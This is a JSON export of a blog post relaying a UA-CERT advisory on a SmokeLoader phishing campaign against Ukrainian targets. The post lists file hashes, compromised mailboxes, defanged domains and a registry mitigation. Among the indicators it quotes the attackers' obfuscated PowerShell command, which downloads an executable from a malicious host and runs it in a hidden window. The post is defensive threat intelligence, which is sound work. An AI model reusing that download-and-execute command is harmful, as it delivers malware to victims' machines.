{"id":1178,"date":"2023-05-09T20:00:49","date_gmt":"2023-05-09T20:00:49","guid":{"rendered":"https:\/\/shawngraham.io\/?p=1178"},"modified":"2026-02-05T19:05:21","modified_gmt":"2026-02-05T19:05:21","slug":"smoke-loader-targets-ukraine","status":"publish","type":"post","link":"https:\/\/shawngraham.io\/?p=1178","title":{"rendered":"Smoke loader targets Ukraine"},"content":{"rendered":"\n<p>The Ukrainian Government&#8217;s Computer Emergency Team, UA-CERT has published some significant findings regarding an email compromise scheme believed to have begun in April of this year after review of associated Domain registrations and file compilation times during malware analysis. The attack begins with the posed zip archive file, which in actuality is something called a polyglot file that can be run by different means and is often used to evade detections. The file contains a decoy as well as a JavaScript loader that will utilize PowerShell to launch a file named &#8220;portable exe&#8221; that then launches smokeloader. <\/p>\n\n\n\n<p>The group tracked as UAC-0006 is known to be financially motivated due to their previous campaigns attributed from 2013-2021. According to UA-Cert, to reduce the risk of initial access you can disable &#8220;wscript.exe (Windows Script Host) on the computer. To do this, in particular, in the registry branch &#8220;{HKEY_CURRENT_USER,HKEY_LOCAL_MACHINE}\\Software\\Microsoft\\Windows Script Host\\Settings&#8221; you must add the entry &#8220;Enabled&#8221; (type: DWORD) with the value &#8220;0&#8221;.&#8221;<\/p>\n\n\n\n<p>Files:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>3de79fc46c7f32807397309d52001b25&nbsp;352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd<\/td><td>pax_2023_ab1058.zip<\/td><\/tr><tr><td>ef40fca1afe6ae5320cf396a736718ad&nbsp;3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25<\/td><td>pax_2023_AB1058.pdf<\/td><\/tr><tr><td>12f77d1be4344fb88f1093550b092ab6&nbsp;f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea&nbsp;<\/td><td>pax_2023_ab1058..js<\/td><\/tr><tr><td>68bc4ce7b6c15f1f5a40e361b2214fce&nbsp; &nbsp;24471f2fd20e7386aa533b51bf851cdeb9ee0750a615273c6004b86e463d36d2<\/td><td>portable.exe<\/td><\/tr><tr><td>8f05b8ea15b88c441219cf8310010df0&nbsp;  cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae<\/td><td>portable.exe<\/td><\/tr><tr><td>185efba2b3bf87e7d49a05ebb0ad5114&nbsp;7ee1ab4270a5293e7151a6321ce17962022802f72a7d58c264e43a016a8a49a4<\/td><td>smoke.exe (SmokeLoader)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><em>Hosts:<\/em><\/p>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<figure class=\"wp-block-table\"><table><tbody><tr><td>%TMP%\\gEq94.exe<\/td><\/tr><tr><td>%TMP%\\gE94.exe<\/td><\/tr><tr><td>%LOCALAPPDATA%\\TempgE94.exe<\/td><\/tr><tr><td>%LOCALAPPDATA%\\TempgEq94.exe<\/td><\/tr><tr><td>%APPDATA%\\cajvchh (\u043d\u0430\u0437\u0432\u0430 \u0444\u0430\u0439\u043b\u0443 \u0437\u043c\u0456\u043d\u043d\u0430)<\/td><\/tr><tr><td>&#8220;C:\\Windows\\System32\\WScript.exe&#8221; &#8220;%USERPROFILE%\\Downloads\\pax_2023_AB1058..js&#8221;<\/td><\/tr><tr><td>&#8220;C:\\Windows\\System32\\cmd.exe&#8221; \/c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1=&#8217;Net.We&#8217;; $v2=&#8217;bClient&#8217;; $var = (New-Object $v1$v2); $var.Headers[&#8216;User-Agent&#8217;] = &#8216;Google Chrome&#8217;; $var.downloadfile(&#8216;hxxp:\/\/homospoison[.]ru\/one\/portable.exe&#8217;,&#8217;%%temp%%gEq94.exe&#8217;); &amp; %%temp%%gEq94.exe &amp; ZJHYOcunksxSdyp<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Network:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">beliy@atl.ua (\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u043e\u0432\u0430\u043d\u0438\u0439 \u043e\u0431\u043b\u0456\u043a\u043e\u0432\u0438\u0439 \u0437\u0430\u043f\u0438\u0441)<br>inbox6@dl.kr-admin.gov.ua (\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u043e\u0432\u0430\u043d\u0438\u0439 \u043e\u0431\u043b\u0456\u043a\u043e\u0432\u0438\u0439 \u0437\u0430\u043f\u0438\u0441)<br>nvn@mayak.dp.ua (\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u043e\u0432\u0430\u043d\u0438\u0439 \u043e\u0431\u043b\u0456\u043a\u043e\u0432\u0438\u0439 \u0437\u0430\u043f\u0438\u0441)<br>hXXp:\/\/homospoison[.]ru\/one\/portable.exe<br>hXXp:\/\/3dstore[.]pro\/<br>hXXp:\/\/balkimotion[.]ru\/<br>hXXp:\/\/coudzoom[.]ru\/<br>hXXp:\/\/criticalosl[.]tech\/<br>hXXp:\/\/humanitarydp[.]ug\/<br>hXXp:\/\/ipodromlan[.]ru\/<br>hXXp:\/\/lamazone[.]site\/<br>hXXp:\/\/ligaspace[.]ru\/<br>hXXp:\/\/maximprofile[.]net\/<br>hXXp:\/\/redport80[.]ru\/<br>hXXp:\/\/shopersport[.]ru\/<br>hXXp:\/\/sindoproperty[.]org\/<br>hXXp:\/\/superboler[.]com\/<br>hXXp:\/\/zaliphone[.]com\/<br>3dstore[.]pro<br>balkimotion[.]ru<br>coudzoom[.]ru<br>criticalosl[.]tech<br>homospoison[.]ru<br>humanitarydp[.]ug<br>ipodromlan[.]ru<br>lamazone[.]site<br>ligaspace[.]ru<br>maximprofile[.]net<br>redport80[.]ru<br>shopersport[.]ru<br>sindoproperty[.]org<br>superboler[.]com<br>zaliphone[.]com<br>193[.]106.175.177<\/pre>\n<\/div>\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"512\" src=\"https:\/\/shawngraham.io\/wp-content\/uploads\/2023\/05\/download-1024x512.png\" alt=\"\" class=\"wp-image-1181\" srcset=\"https:\/\/shawngraham.io\/wp-content\/uploads\/2023\/05\/download-1024x512.png 1024w, https:\/\/shawngraham.io\/wp-content\/uploads\/2023\/05\/download-300x150.png 300w, https:\/\/shawngraham.io\/wp-content\/uploads\/2023\/05\/download-768x384.png 768w, https:\/\/shawngraham.io\/wp-content\/uploads\/2023\/05\/download-1536x768.png 1536w, https:\/\/shawngraham.io\/wp-content\/uploads\/2023\/05\/download-2048x1025.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The source of this information and the IOCs come directly from UA Cert&#8217;s article <a href=\"https:\/\/cert.gov.ua\/article\/4555802\" title=\"\">here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Ukrainian Government&#8217;s Computer Emergency Team, UA-CERT has published some significant findings regarding an email compromise scheme believed to have begun in April of this year after review of associated Domain registrations and file compilation times during malware analysis. The attack begins with the posed zip archive file, which in actuality is something called a&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1178","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shawngraham.io\/index.php?rest_route=\/wp\/v2\/posts\/1178","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/shawngraham.io\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shawngraham.io\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shawngraham.io\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shawngraham.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1178"}],"version-history":[{"count":0,"href":"https:\/\/shawngraham.io\/index.php?rest_route=\/wp\/v2\/posts\/1178\/revisions"}],"wp:attachment":[{"href":"https:\/\/shawngraham.io\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1178"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shawngraham.io\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1178"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shawngraham.io\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1178"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}